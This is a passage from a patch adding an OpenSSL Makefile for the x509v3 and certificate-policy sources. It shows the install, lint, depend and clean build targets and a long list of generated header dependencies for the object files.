+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+pcy_cache.o: ../../e_os.h ../../include/openssl/asn1.h
+pcy_cache.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pcy_cache.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pcy_cache.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pcy_cache.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_cache.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_cache.o: ../../include/openssl/opensslconf.h
+pcy_cache.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pcy_cache.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pcy_cache.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pcy_cache.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pcy_cache.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+pcy_cache.o: ../cryptlib.h pcy_cache.c pcy_int.h
+pcy_data.o: ../../e_os.h ../../include/openssl/asn1.h
+pcy_data.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pcy_data.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pcy_data.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pcy_data.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_data.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_data.o: ../../include/openssl/opensslconf.h
+pcy_data.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pcy_data.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pcy_data.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pcy_data.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pcy_data.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+pcy_data.o: ../cryptlib.h pcy_data.c pcy_int.h
+pcy_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+pcy_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pcy_lib.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pcy_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pcy_lib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+pcy_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+pcy_lib.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pcy_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pcy_lib.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pcy_lib.o: ../../include/openssl/x509v3.h ../cryptlib.h pcy_int.h pcy_lib.c
+pcy_map.o: ../../e_os.h ../../include/openssl/asn1.h
+pcy_map.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pcy_map.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pcy_map.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pcy_map.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_map.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_map.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+pcy_map.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+pcy_map.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pcy_map.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pcy_map.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pcy_map.o: ../../include/openssl/x509v3.h ../cryptlib.h pcy_int.h pcy_map.c
+pcy_node.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+pcy_node.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+pcy_node.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pcy_node.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_node.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_node.o: ../../include/openssl/opensslconf.h
+pcy_node.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pcy_node.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pcy_node.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pcy_node.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pcy_node.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+pcy_node.o: pcy_int.h pcy_node.c
+pcy_tree.o: ../../e_os.h ../../include/openssl/asn1.h
+pcy_tree.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pcy_tree.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pcy_tree.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pcy_tree.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_tree.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_tree.o: ../../include/openssl/opensslconf.h
+pcy_tree.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pcy_tree.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pcy_tree.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pcy_tree.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pcy_tree.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+pcy_tree.o: ../cryptlib.h pcy_int.h pcy_tree.c
+v3_addr.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_addr.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_addr.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_addr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_addr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_addr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_addr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_addr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_addr.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_addr.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_addr.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_addr.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_addr.o: ../cryptlib.h v3_addr.c
+v3_akey.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_akey.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_akey.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_akey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_akey.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_akey.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_akey.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_akey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_akey.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_akey.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_akey.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_akey.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_akey.o: ../cryptlib.h v3_akey.c
+v3_akeya.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_akeya.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_akeya.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_akeya.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_akeya.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_akeya.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_akeya.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_akeya.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_akeya.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_akeya.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_akeya.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_akeya.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_akeya.o: ../cryptlib.h v3_akeya.c
+v3_alt.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_alt.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_alt.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_alt.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_alt.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_alt.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_alt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_alt.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_alt.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_alt.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_alt.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_alt.o: ../cryptlib.h v3_alt.c
+v3_asid.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_asid.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_asid.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+v3_asid.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_asid.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_asid.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_asid.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_asid.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_asid.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_asid.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_asid.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_asid.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_asid.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_asid.c
+v3_bcons.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_bcons.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_bcons.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_bcons.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_bcons.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_bcons.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_bcons.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_bcons.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_bcons.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_bcons.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_bcons.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_bcons.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_bcons.o: ../cryptlib.h v3_bcons.c
+v3_bitst.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_bitst.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_bitst.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_bitst.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_bitst.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_bitst.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_bitst.o: ../../include/openssl/opensslconf.h
+v3_bitst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_bitst.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_bitst.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_bitst.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_bitst.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_bitst.o: ../cryptlib.h v3_bitst.c
+v3_conf.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_conf.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_conf.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_conf.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_conf.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_conf.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_conf.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_conf.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_conf.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_conf.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_conf.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_conf.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_conf.c
+v3_cpols.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_cpols.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_cpols.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_cpols.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_cpols.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_cpols.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_cpols.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_cpols.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_cpols.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_cpols.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_cpols.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_cpols.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_cpols.o: ../cryptlib.h pcy_int.h v3_cpols.c
+v3_crld.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_crld.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_crld.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_crld.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_crld.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_crld.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_crld.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_crld.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_crld.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_crld.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_crld.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_crld.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_crld.o: ../cryptlib.h v3_crld.c
+v3_enum.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_enum.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_enum.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_enum.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_enum.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_enum.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_enum.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_enum.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_enum.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_enum.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_enum.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_enum.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_enum.c
+v3_extku.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_extku.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_extku.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_extku.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_extku.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_extku.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_extku.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_extku.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_extku.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_extku.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_extku.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_extku.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_extku.o: ../cryptlib.h v3_extku.c
+v3_genn.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_genn.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_genn.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_genn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_genn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_genn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_genn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_genn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_genn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_genn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_genn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_genn.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_genn.o: ../cryptlib.h v3_genn.c
+v3_ia5.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_ia5.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_ia5.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_ia5.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_ia5.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_ia5.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_ia5.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_ia5.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_ia5.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_ia5.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_ia5.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_ia5.o: ../cryptlib.h v3_ia5.c
+v3_info.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_info.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_info.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_info.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_info.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_info.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_info.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_info.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_info.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_info.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_info.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_info.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_info.o: ../cryptlib.h v3_info.c
+v3_int.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_int.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_int.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_int.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_int.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_int.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_int.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_int.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_int.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_int.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_int.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_int.o: ../cryptlib.h v3_int.c
+v3_lib.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_lib.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_lib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_lib.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_lib.o: ../cryptlib.h ext_dat.h v3_lib.c
+v3_ncons.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_ncons.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_ncons.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_ncons.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_ncons.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_ncons.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_ncons.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_ncons.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_ncons.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_ncons.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_ncons.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_ncons.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_ncons.o: ../cryptlib.h v3_ncons.c
+v3_ocsp.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_ocsp.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_ocsp.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_ocsp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_ocsp.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_ocsp.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_ocsp.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+v3_ocsp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_ocsp.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_ocsp.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_ocsp.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_ocsp.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_ocsp.o: ../cryptlib.h v3_ocsp.c
+v3_pci.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_pci.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_pci.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_pci.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_pci.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_pci.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_pci.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_pci.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_pci.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_pci.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_pci.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_pci.o: ../cryptlib.h v3_pci.c
+v3_pcia.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+v3_pcia.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_pcia.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_pcia.o: ../../include/openssl/e_os2.h ../../include/openssl/evp.h
+v3_pcia.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_pcia.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_pcia.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_pcia.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_pcia.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_pcia.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_pcia.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_pcia.o: v3_pcia.c
+v3_pcons.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_pcons.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_pcons.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_pcons.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_pcons.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_pcons.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_pcons.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_pcons.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_pcons.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_pcons.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_pcons.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_pcons.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_pcons.o: ../cryptlib.h v3_pcons.c
+v3_pku.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_pku.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_pku.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_pku.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_pku.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_pku.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_pku.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_pku.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_pku.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_pku.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_pku.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_pku.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_pku.o: ../cryptlib.h v3_pku.c
+v3_pmaps.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_pmaps.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_pmaps.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_pmaps.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_pmaps.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_pmaps.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_pmaps.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_pmaps.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_pmaps.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_pmaps.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_pmaps.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_pmaps.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
